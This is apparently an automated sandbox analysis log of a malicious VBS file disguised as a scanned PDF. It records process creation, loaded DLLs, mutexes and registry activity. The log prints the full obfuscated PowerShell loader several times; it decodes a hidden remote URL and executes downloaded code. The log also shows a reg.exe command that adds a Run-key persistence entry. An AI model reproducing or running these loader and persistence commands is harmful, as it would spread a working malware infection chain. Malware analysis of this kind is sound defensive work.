              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-K8KWVT
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfwzfhji.lxz.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Spejlingernes.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7972
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7216
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
